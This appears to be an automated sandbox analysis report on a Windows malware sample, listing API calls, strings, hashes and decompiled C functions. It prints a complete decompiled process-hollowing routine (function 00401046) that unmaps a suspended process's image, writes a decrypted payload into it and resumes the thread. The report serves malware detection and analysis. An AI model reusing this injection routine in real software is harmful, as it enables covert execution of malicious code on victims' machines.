CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,004026C0,?,?,?,00000000), ref: 0040152F
MessageBoxA.USER32 ref: 0040156B
??2@YAPAXI@Z.MSVCRT ref: 00401589
Sleep.KERNELBASE(?,?,?,00000000), ref: 004015EA
GetCommandLineA.KERNEL32(?,?,00000000), ref: 004015F5
CreateFileA.KERNELBASE(00000000,C0000000,00000000,00000000,00000002,00000002,00000000,?,?,00000000), ref: 00401626
FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000), ref: 00401632
PathCombineA.SHLWAPI(00000000,00000000,MSDefaultBrowser.html,?,?,00000000), ref: 0040168E
CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,00000000), ref: 004016AA
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 004016B6
FindExecutableA.SHELL32(00000000,00000000,00000000), ref: 004016CB
DeleteFileA.KERNEL32(00000000,?,?,00000000), ref: 004016DE

Part of subcall function 00401046: LoadLibraryA.KERNEL32(kernel32.dll,74B5F7E0,00000000,00000000), ref: 00401057
Part of subcall function 00401046: GetProcAddress.KERNEL32(00000000,SetThreadContext), ref: 00401091
Part of subcall function 00401046: GetProcAddress.KERNEL32(00000000,ResumeThread), ref: 0040109E
Part of subcall function 00401046: GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 004010AB
Part of subcall function 00401046: GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 004010BA
Part of subcall function 00401046: GetProcAddress.KERNEL32(00000000), ref: 004010C1
Part of subcall function 00401046: GetProcAddress.KERNEL32(00000000,VirtualAllocEx), ref: 004010CE
Part of subcall function 00401046: GetProcAddress.KERNEL32(00000000,WriteProcessMemory), ref: 004010DB
Part of subcall function 00401046: GetProcAddress.KERNEL32(00000000,GetThreadContext), ref: 004010E8
Part of subcall function 00401046: CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,00000000), ref: 00401104
Part of subcall function 00401046: NtUnmapViewOfSection.NTDLL(00000000,?), ref: 0040110D
Part of subcall function 00401046: VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00401120
Part of subcall function 00401046: WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 00401131
Part of subcall function 00401046: WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 00401169

DeleteFileA.KERNEL32(00000000,?,?,00000000), ref: 00401701
Sleep.KERNELBASE(000001F4,?,?,00000000), ref: 00401708
PathCombineA.SHLWAPI(00000000,00000000,-000000C9,?,?,00000000), ref: 0040173A
DeleteFileA.KERNELBASE(00000000,?,?,00000000), ref: 00401747

Strings

p, xrefs: 004015D3
APPDATA, xrefs: 00401306
TEMP, xrefs: 004012F7
MSDefaultBrowser.html, xrefs: 00401681
YGN3456789, xrefs: 004014CC
Microsoft Base Cryptographic Provider v1.0, xrefs: 00401476, 00401493

Memory Dump Source

Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Resource$AddressFileProc$Crypt$Message$??2@CreateFindPath$CombineDeleteLoadProcessSleepWindow$AcquireCloseContextDesktopEnvironmentHandleHashLockMemoryModuleSizeofVariableWrite$AllocButtonChangeCheckedCommandDataDecryptDeriveDialogDispatchExecutableExistsLibraryLineNameNotificationPeekSectionTranslateUnmapViewVirtual
String ID: APPDATA$MSDefaultBrowser.html$Microsoft Base Cryptographic Provider v1.0$TEMP$YGN3456789$p
API String ID: 2862719199-2839325405
Opcode ID: c7ca95cba52b893995a95fe1f87349c96a4a1c78b1fc02950cc577c5621a77e5
Instruction ID: 0dca69b1a13e7b935d10de9f8f5091165e44e57de89191cc5cb1a4d17ae4f859
Opcode Fuzzy Hash: c7ca95cba52b893995a95fe1f87349c96a4a1c78b1fc02950cc577c5621a77e5
Instruction Fuzzy Hash: 7BE15972901218ABDF21CFA0DD49ADEBBBDFB48311F1040A6F605F6290D7759A44CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401046, Relevance: 50.9, APIs: 18, Strings: 11, Instructions: 131
libraryloaderinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401046(CHAR* _a4, SIZE_T* _a8, SIZE_T* _a12) {
				_Unknown_base(*)()* _v8;
				_Unknown_base(*)()* _v12;
				struct _PROCESS_INFORMATION _v28;
				void _v32;
				_Unknown_base(*)()* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				_Unknown_base(*)()* _v48;
				struct _STARTUPINFOA _v116;
				struct _CONTEXT _v832;
				struct HINSTANCE__* _t74;
				void* _t102;
				void* _t110;
				signed int _t111;
				void* _t120;

				_t74 = LoadLibraryA("kernel32.dll");
				_t110 = _a8;
				_v8 = _t74;
				_t111 = 0x11;
				_v832.ContextFlags = 0x10007;
				memset( &_v116, 0, _t111 << 2);
				_v116.cb = 0x44;
				_t120 =  *((intOrPtr*)(_t110 + 0x3c)) + _t110;
				_v44 = GetProcAddress(_v8, "SetThreadContext");
				_v36 = GetProcAddress(_v8, "ResumeThread");
				_a8 = GetProcAddress(_v8, "CreateProcessA");
				_v48 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
				_v40 = GetProcAddress(_v8, "VirtualAllocEx");
				_v12 = GetProcAddress(_v8, "WriteProcessMemory");
				_v8 = GetProcAddress(_v8, "GetThreadContext");
				CreateProcessA(_a4, _a12, 0, 0, 0, 4, 0, 0,  &_v116,  &_v28);
				NtUnmapViewOfSection(_v28.hProcess,  *(_t120 + 0x34));
				_v32 = VirtualAllocEx(_v28.hProcess,  *(_t120 + 0x34),  *(_t120 + 0x50), 0x3000, 0x40);
				WriteProcessMemory(_v28.hProcess,  *(_t120 + 0x34), _t110,  *(_t120 + 0x54), 0);
				_a12 = 0;
				if( *(_t120 + 6) > 0) {
					_a8 = 0;
					do {
						WriteProcessMemory(_v28.hProcess,  *((intOrPtr*)(_a8 +  *((intOrPtr*)(_t110 + 0x3c)) + _t110 + 0xf8 + 0xc)) +  *(_t120 + 0x34),  *((intOrPtr*)(_a8 +  *((intOrPtr*)(_t110 + 0x3c)) + _t110 + 0x10c)) + _t110,  *(_a8 +  *((intOrPtr*)(_t110 + 0x3c)) + _t110 + 0x108), 0);
						_a12 =  &(_a12[1]);
						_a8 = _a8 + 0x28;
					} while (_a12 < ( *(_t120 + 6) & 0x0000ffff));
				}
				GetThreadContext(_v28.hThread,  &_v832);
				WriteProcessMemory(_v28, _v832.Ebx + 8,  &_v32, 4, 0);
				_v832.Eax =  *((intOrPtr*)(_t120 + 0x28)) +  *(_t120 + 0x34);
				SetThreadContext(_v28.hThread,  &_v832);
				ResumeThread(_v28.hThread);
				_t102 = 1;
				return _t102;
			}

0x00401057
0x0040105d
0x00401062
0x00401065
0x00401076
0x00401080
0x00401088
0x0040108f
0x00401098
0x004010a5
0x004010b7
0x004010c8
0x004010d5
0x004010e2
0x004010ea
0x00401104
0x0040110d
0x00401124
0x00401131
0x00401138
0x0040113b
0x0040113d
0x00401140
0x00401169
0x00401170
0x00401173
0x00401177
0x00401140
0x00401186
0x0040119d
0x004011a6
0x004011b6
0x004011bc
0x004011c1
0x004011c6

APIs

LoadLibraryA.KERNEL32(kernel32.dll,74B5F7E0,00000000,00000000), ref: 00401057
GetProcAddress.KERNEL32(00000000,SetThreadContext), ref: 00401091
GetProcAddress.KERNEL32(00000000,ResumeThread), ref: 0040109E
GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 004010AB
GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 004010BA
GetProcAddress.KERNEL32(00000000), ref: 004010C1
GetProcAddress.KERNEL32(00000000,VirtualAllocEx), ref: 004010CE
GetProcAddress.KERNEL32(00000000,WriteProcessMemory), ref: 004010DB
GetProcAddress.KERNEL32(00000000,GetThreadContext), ref: 004010E8
CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,00000000), ref: 00401104
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 0040110D
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00401120
WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 00401131
WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 00401169
GetThreadContext.KERNELBASE(0000C350,00010007), ref: 00401186
WriteProcessMemory.KERNELBASE(00000000,?,004016F7,00000004,00000000), ref: 0040119D
SetThreadContext.KERNELBASE(0000C350,00010007), ref: 004011B6
ResumeThread.KERNELBASE(0000C350), ref: 004011BC

Strings

CreateProcessA, xrefs: 004010A0
D, xrefs: 00401088
(, xrefs: 00401173
kernel32.dll, xrefs: 00401052
VirtualAllocEx, xrefs: 004010C3
ntdll.dll, xrefs: 004010B2
GetThreadContext, xrefs: 004010DD
WriteProcessMemory, xrefs: 004010D0
SetThreadContext, xrefs: 0040106E
ResumeThread, xrefs: 00401093
NtUnmapViewOfSection, xrefs: 004010AD

Memory Dump Source

Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressProc$Process$MemoryThreadWrite$Context$AllocCreateHandleLibraryLoadModuleResumeSectionUnmapViewVirtual
String ID: ($CreateProcessA$D$GetThreadContext$NtUnmapViewOfSection$ResumeThread$SetThreadContext$VirtualAllocEx$WriteProcessMemory$kernel32.dll$ntdll.dll
API String ID: 3906057711-2335503490
Opcode ID: 64ff6c4202f09b1962c8d33dd8508062e00f548990672d335044324c992e8c7c
Instruction ID: 59b423de3ce8e75a4fe9c6daadb1354d7465d9fc2d4f27810ddbe7435c117431
Opcode Fuzzy Hash: 64ff6c4202f09b1962c8d33dd8508062e00f548990672d335044324c992e8c7c
Instruction Fuzzy Hash: 1751F471900208AFDF219FA5CD49EEEBBB9FF88704F10406AFA05B61A0D7759A50DF64

Uniqueness

Uniqueness Score: -1.00%

Function 00401046, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 131
injectionthreadprocessCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E00401046(CHAR* _a4, SIZE_T* _a8, SIZE_T* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct _PROCESS_INFORMATION _v28;
				void _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				struct _STARTUPINFOA _v116;
				struct _CONTEXT _v832;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t78;
				SIZE_T* _t79;
				intOrPtr _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				void* _t102;
				void* _t110;
				signed int _t111;
				intOrPtr* _t117;
				void* _t120;

				_t74 =  *0x403064(0x4040d0);
				_t110 = _a8;
				_v8 = _t74;
				_t111 = 0x11;
				_v832.ContextFlags = 0x10007;
				memset( &_v116, 0, _t111 << 2);
				_t117 =  *0x403070;
				_v116.cb = 0x44;
				_t120 =  *((intOrPtr*)(_t110 + 0x3c)) + _t110;
				_t77 =  *_t117(_v8, 0x4040bc);
				_v44 = _t77;
				_t78 =  *_t117(_v8, 0x4040ac);
				_v36 = _t78;
				_t79 =  *_t117(_v8, 0x40409c);
				_a8 = _t79;
				_t81 =  *_t117( *0x403068(0x404078, 0x404084));
				_v48 = _t81;
				_t82 =  *_t117(_v8, 0x404068);
				_v40 = _t82;
				_t83 =  *_t117(_v8, 0x404054);
				_v12 = _t83;
				_v8 =  *_t117(_v8, 0x404040);
				CreateProcessA(_a4, _a12, 0, 0, 0, 4, 0, 0,  &_v116,  &_v28);
				NtUnmapViewOfSection(_v28.hProcess,  *(_t120 + 0x34));
				_v32 = VirtualAllocEx(_v28.hProcess,  *(_t120 + 0x34),  *(_t120 + 0x50), 0x3000, 0x40);
				WriteProcessMemory(_v28.hProcess,  *(_t120 + 0x34), _t110,  *(_t120 + 0x54), 0);
				_a12 = 0;
				if( *(_t120 + 6) > 0) {
					_a8 = 0;
					do {
						WriteProcessMemory(_v28.hProcess,  *((intOrPtr*)(_a8 +  *((intOrPtr*)(_t110 + 0x3c)) + _t110 + 0xf8 + 0xc)) +  *(_t120 + 0x34),  *((intOrPtr*)(_a8 +  *((intOrPtr*)(_t110 + 0x3c)) + _t110 + 0x10c)) + _t110,  *(_a8 +  *((intOrPtr*)(_t110 + 0x3c)) + _t110 + 0x108), 0);
						_a12 =  &(_a12[1]);
						_a8 = _a8 + 0x28;
					} while (_a12 < ( *(_t120 + 6) & 0x0000ffff));
				}
				GetThreadContext(_v28.hThread,  &_v832);
				WriteProcessMemory(_v28, _v832.Ebx + 8,  &_v32, 4, 0);
				_v832.Eax =  *((intOrPtr*)(_t120 + 0x28)) +  *(_t120 + 0x34);
				SetThreadContext(_v28.hThread,  &_v832);
				ResumeThread(_v28.hThread);
				_t102 = 1;
				return _t102;
			}

0x00401057
0x0040105d
0x00401062
0x00401065
0x00401076
0x00401080
0x00401082
0x00401088
0x0040108f
0x00401091
0x00401098
0x0040109e
0x004010a5
0x004010ab
0x004010b7
0x004010c1
0x004010c8
0x004010ce
0x004010d5
0x004010db
0x004010e2
0x004010ea
0x00401104
0x0040110d
0x00401124
0x00401131
0x00401138
0x0040113b
0x0040113d
0x00401140
0x00401169
0x00401170
0x00401173
0x00401177
0x00401140
0x00401186
0x0040119d
0x004011a6
0x004011b6
0x004011bc
0x004011c1
0x004011c6

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,00000000), ref: 00401104
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 0040110D
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00401120
WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 00401131
WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 00401169
GetThreadContext.KERNELBASE(0000C350,00010007), ref: 00401186
WriteProcessMemory.KERNELBASE(00000000,?,004016F7,00000004,00000000), ref: 0040119D
SetThreadContext.KERNELBASE(0000C350,00010007), ref: 004011B6
ResumeThread.KERNELBASE(0000C350), ref: 004011BC

Strings

(, xrefs: 00401173
D, xrefs: 00401088

Memory Dump Source

Source File: 00000002.00000001.202496092.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Process$MemoryThreadWrite$Context$AllocCreateResumeSectionUnmapViewVirtual
String ID: ($D
API String ID: 3932078547-1229367909
Opcode ID: 64ff6c4202f09b1962c8d33dd8508062e00f548990672d335044324c992e8c7c
Instruction ID: 59b423de3ce8e75a4fe9c6daadb1354d7465d9fc2d4f27810ddbe7435c117431
Opcode Fuzzy Hash: 64ff6c4202f09b1962c8d33dd8508062e00f548990672d335044324c992e8c7c
Instruction Fuzzy Hash: 1751F471900208AFDF219FA5CD49EEEBBB9FF88704F10406AFA05B61A0D7759A50DF64

Uniqueness

Uniqueness Score: -1.00%

Function 0040258C, Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 73%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x4031a8);
				_push(0x40275e);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x404244 =  *0x404244 | 0xffffffff;
				 *0x404248 =  *0x404248 | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x404238; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x404234; // 0x0
				 *_t24 = _t47;
				 *0x404240 = _adjust_fdiv;
				_t27 = E0040275D( *_adjust_fdiv);
				_t61 =  *0x404228; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E0040275A);
				}
				E00402748(_t27);
				_push(0x404014);
				_push(0x404010);
				L00402742();
				_t29 =  *0x404230; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x40422c,  &_v112);
				_push(0x40400c);
				_push(0x404000); // executed
				L00402742(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_push(0);
				_push(GetModuleHandleA(0)); // executed
				_t40 = E00401282(); // executed
				_v108 = _t40;
				exit(_t40); // executed
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0040273C();
				return _t41;
			}

0x0040258f
0x00402591
0x00402596
0x004025a1
0x004025a2
0x004025af
0x004025b4
0x004025b9
0x004025c0
0x004025c7
0x004025ce
0x004025d4
0x004025da
0x004025dc
0x004025e2
0x004025e8
0x004025f1
0x004025f6
0x004025fb
0x00402601
0x00402608
0x0040260e
0x0040260f
0x00402614
0x00402619
0x0040261e
0x00402623
0x00402628
0x00402641
0x00402647
0x0040264c
0x00402651
0x0040265e
0x00402660
0x00402666
0x004026a2
0x004026a7
0x004026a8
0x004026a8
0x00402668
0x00402668
0x00402668
0x00402669
0x0040266c
0x0040266e
0x00402679
0x0040267b
0x0040267b
0x0040267c
0x0040267c
0x00402679
0x0040267f
0x00402683
0x00000000
0x00000000
0x00402689
0x00402690
0x0040269a
0x004026af
0x0040269c
0x0040269c
0x0040269c
0x004026b0
0x004026b1
0x004026b2
0x004026ba
0x004026bb
0x004026c0
0x004026c4
0x004026ca
0x004026cf
0x004026d1
0x004026d4
0x004026d5
0x004026d6
0x004026dd

APIs

__set_app_type.MSVCRT ref: 004025B9
__p__fmode.MSVCRT ref: 004025CE
__p__commode.MSVCRT ref: 004025DC
__setusermatherr.MSVCRT ref: 00402608
_initterm.MSVCRT ref: 0040261E
__getmainargs.MSVCRT ref: 00402641
_initterm.MSVCRT ref: 00402651
GetStartupInfoA.KERNEL32(?), ref: 00402690
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004026B4
exit.KERNELBASE ref: 004026C4
_XcptFilter.MSVCRT ref: 004026D6

Memory Dump Source

Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: d306706b69f3d6a4d3e27220cd129a2d81cff2058f5cd0f565b6c2f970be1176
Instruction ID: 6f568f106f0c5193084e1fa47d590620f0c2c7fc96d50e62ecd6fd4fccb52519
Opcode Fuzzy Hash: d306706b69f3d6a4d3e27220cd129a2d81cff2058f5cd0f565b6c2f970be1176
Instruction Fuzzy Hash: 2B4171B1941304AFDB209FA4DA49AAABFB8EB49711F20053FF541B73E5C7B84941CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00401282, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 426sleepfileCOMMON

Download Yara Rule

APIs

PathCombineA.KERNELBASE(00000000,00000000,000000BA,?,?,00000000), ref: 00401439
PathFileExistsA.KERNELBASE(00000000,?,?,00000000), ref: 00401446
Sleep.KERNELBASE(?,?,?,00000000), ref: 004015EA
CreateFileA.KERNELBASE(00000000,C0000000,00000000,00000000,00000002,00000002,00000000,?,?,00000000), ref: 00401626
FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000), ref: 00401632
Sleep.KERNELBASE(000001F4,?,?,00000000), ref: 00401708
DeleteFileA.KERNELBASE(00000000,?,?,00000000), ref: 00401747

Part of subcall function 00401046: CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,00000000), ref: 00401104
Part of subcall function 00401046: NtUnmapViewOfSection.NTDLL(00000000,?), ref: 0040110D
Part of subcall function 00401046: VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00401120
Part of subcall function 00401046: WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 00401131
Part of subcall function 00401046: WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 00401169

Strings

p, xrefs: 004015D3

Memory Dump Source

Source File: 00000002.00000001.202496092.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: FileProcess$CreateMemoryPathSleepWrite$AllocChangeCloseCombineDeleteExistsFindNotificationSectionUnmapViewVirtual
String ID: p
API String ID: 568926916-2181537457
Opcode ID: c7ca95cba52b893995a95fe1f87349c96a4a1c78b1fc02950cc577c5621a77e5
Instruction ID: 0dca69b1a13e7b935d10de9f8f5091165e44e57de89191cc5cb1a4d17ae4f859
Opcode Fuzzy Hash: c7ca95cba52b893995a95fe1f87349c96a4a1c78b1fc02950cc577c5621a77e5
Instruction Fuzzy Hash: 7BE15972901218ABDF21CFA0DD49ADEBBBDFB48311F1040A6F605F6290D7759A44CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004024EE, Relevance: 3.0, APIs: 2, Instructions: 12COMMON

Download Yara Rule

APIs

_onexit.KERNELBASE ref: 004024FB
__dllonexit.MSVCRT ref: 00402511

Memory Dump Source

Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __dllonexit_onexit
String ID:
API String ID: 2384194067-0
Opcode ID: 9eaf4d21117ec0aac5630d272f27c53da11a7665701558084c8a6dd267926514
Instruction ID: 0746876295c9db5c40648a75900faa414fd9ba57d79639dc2df41df903a86600
Opcode Fuzzy Hash: 9eaf4d21117ec0aac5630d272f27c53da11a7665701558084c8a6dd267926514
Instruction Fuzzy Hash: 52C012B5640200BACA102B10FE0A5467751E7D0776B7043BEF265310F087791610AA0E

Uniqueness

Uniqueness Score: -1.00%

Function 0040258C, Relevance: 1.6, APIs: 1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 25%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				signed char _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				signed short _v48;
				signed char _v52;
				char _v96;
				char _v100;
				char _v104;
				int _v108;
				char _v112;
				char _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t39;
				int _t41;
				intOrPtr* _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr* _t56;
				void* _t57;
				intOrPtr _t59;

				 *[fs:0x0] = _t59;
				_v28 = _t59 - 0x68;
				_v8 = 0;
				 *0x403088(2, __edi, __esi, __ebx,  *[fs:0x0], 0x40275e, 0x4031a8, 0xffffffff, _t57);
				 *0x404244 =  *0x404244 | 0xffffffff;
				 *0x404248 =  *0x404248 | 0xffffffff;
				 *((intOrPtr*)( *0x40308c())) =  *0x404238;
				 *((intOrPtr*)( *0x403090())) =  *0x404234;
				 *0x404240 =  *((intOrPtr*)( *0x403094));
				_t27 = E0040275D( *((intOrPtr*)( *0x403094)));
				if( *0x404228 == 0) {
					_t27 =  *0x403098(E0040275A);
				}
				E00402748(_t27);
				L00402742();
				_v112 =  *0x404230;
				 *0x4030a8( &_v100,  &_v116,  &_v104,  *0x40422c,  &_v112, 0x404010, 0x404014);
				_push(0x40400c);
				_push(0x404000); // executed
				L00402742(); // executed
				_t56 =  *((intOrPtr*)( *0x4030ac));
				_v120 = _t56;
				if( *_t56 != 0x22) {
					while( *_t56 > 0x20) {
						_t56 = _t56 + 1;
						_v120 = _t56;
					}
				} else {
					do {
						_t56 = _t56 + 1;
						_v120 = _t56;
						_t43 =  *_t56;
					} while (_t43 != 0 && _t43 != 0x22);
					if( *_t56 == 0x22) {
						L6:
						_t56 = _t56 + 1;
						_v120 = _t56;
					}
				}
				_t36 =  *_t56;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v52 = 0;
				 *0x403058( &_v96);
				if((_v52 & 0x00000001) == 0) {
					_t39 = 0xa;
				} else {
					_t39 = _v48 & 0x0000ffff;
				}
				_push( *0x403068(0, 0, _t56, _t39)); // executed
				_t41 = E00401282(); // executed
				_v108 = _t41;
				exit(_t41); // executed
				_t42 = _v24;
				_t50 =  *((intOrPtr*)( *_t42));
				_v124 = _t50;
				_push(_t42);
				_push(_t50);
				L0040273C();
				return _t42;
			}

0x004025a2
0x004025af
0x004025b4
0x004025b9
0x004025c0
0x004025c7
0x004025da
0x004025e8
0x004025f1
0x004025f6
0x00402601
0x00402608
0x0040260e
0x0040260f
0x0040261e
0x00402628
0x00402641
0x00402647
0x0040264c
0x00402651
0x0040265e
0x00402660
0x00402666
0x004026a2
0x004026a7
0x004026a8
0x004026a8
0x00402668
0x00402668
0x00402668
0x00402669
0x0040266c
0x0040266e
0x00402679
0x0040267b
0x0040267b
0x0040267c
0x0040267c
0x00402679
0x0040267f
0x00402683
0x00000000
0x00000000
0x00402689
0x00402690
0x0040269a
0x004026af
0x0040269c
0x0040269c
0x0040269c
0x004026ba
0x004026bb
0x004026c0
0x004026c4
0x004026ca
0x004026cf
0x004026d1
0x004026d4
0x004026d5
0x004026d6
0x004026dd

APIs

exit.KERNELBASE(00000000,00000000,?,0000000A), ref: 004026C4

Memory Dump Source

Source File: 00000002.00000001.202496092.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: exit
String ID:
API String ID: 2483651598-0
Opcode ID: d306706b69f3d6a4d3e27220cd129a2d81cff2058f5cd0f565b6c2f970be1176
Instruction ID: 6f568f106f0c5193084e1fa47d590620f0c2c7fc96d50e62ecd6fd4fccb52519
Opcode Fuzzy Hash: d306706b69f3d6a4d3e27220cd129a2d81cff2058f5cd0f565b6c2f970be1176
Instruction Fuzzy Hash: 2B4171B1941304AFDB209FA4DA49AAABFB8EB49711F20053FF541B73E5C7B84941CB18

Uniqueness

Uniqueness Score: -1.00%

Function 004024EE, Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

_onexit.KERNELBASE(?,00402523,?,00401775,004024E6), ref: 004024FB

Memory Dump Source

Source File: 00000002.00000001.202496092.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _onexit
String ID:
API String ID: 572287377-0
Opcode ID: 9eaf4d21117ec0aac5630d272f27c53da11a7665701558084c8a6dd267926514
Instruction ID: 0746876295c9db5c40648a75900faa414fd9ba57d79639dc2df41df903a86600
Opcode Fuzzy Hash: 9eaf4d21117ec0aac5630d272f27c53da11a7665701558084c8a6dd267926514
Instruction Fuzzy Hash: 52C012B5640200BACA102B10FE0A5467751E7D0776B7043BEF265310F087791610AA0E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004018F0, Relevance: 31.8, APIs: 11, Strings: 7, Instructions: 338
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004018F0(void* __ecx, void* __eflags, char _a4, signed int _a8, void* _a12, int _a16, int _a20, int _a24, long _a28, void* _a32, CHAR* _a36, void _a40, int _a44, intOrPtr _a48, char _a52, intOrPtr _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, int _a72, char _a76, void _a77, char _a95, char _a1076, void _a1077, char _a2076, void _a2077, char _a3076, void _a3077, char _a4076, void _a4077, char _a5100, void _a5101, void _a6124, void _a6125, intOrPtr _a6136, intOrPtr _a6140, intOrPtr _a6144, intOrPtr _a6148, char _a16116, int _a16124, intOrPtr* _a16140) {
				CHAR** _v0;
				int _v4;
				int _v8;
				char _v9;
				int _v12;
				signed int _v16;
				signed int _v17;
				intOrPtr _v20;
				CHAR* _t110;
				CHAR* _t111;
				long _t117;
				char _t140;
				CHAR* _t144;
				CHAR* _t145;
				CHAR* _t149;
				intOrPtr _t154;
				intOrPtr _t157;
				intOrPtr _t160;
				CHAR** _t162;
				void* _t163;
				intOrPtr _t166;
				CHAR* _t197;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t212;
				intOrPtr _t218;
				signed int _t219;
				char* _t222;
				signed int _t231;
				CHAR* _t256;
				void* _t266;
				CHAR* _t267;
				void* _t270;
				intOrPtr _t273;
				void* _t276;
				void* _t282;
				void* _t292;

				_push(0xffffffff);
				_push(E00402786);
				 *[fs:0x0] = _t273;
				_t110 = E00402550(0x3f08, __ecx,  *[fs:0x0]);
				_push(0x104);
				L004024E8();
				 *_t110 =  *_a16140;
				_t111 = lstrcatA("\\\\.\\", _t110);
				_a4076 = 0;
				memset( &_a4077, 0, 0xff << 2);
				asm("stosw");
				asm("stosb");
				_a5100 = 0;
				memset( &_a5101, 0, 0xff << 2);
				_t276 = _t273 + 0x1c;
				asm("stosw");
				asm("stosb");
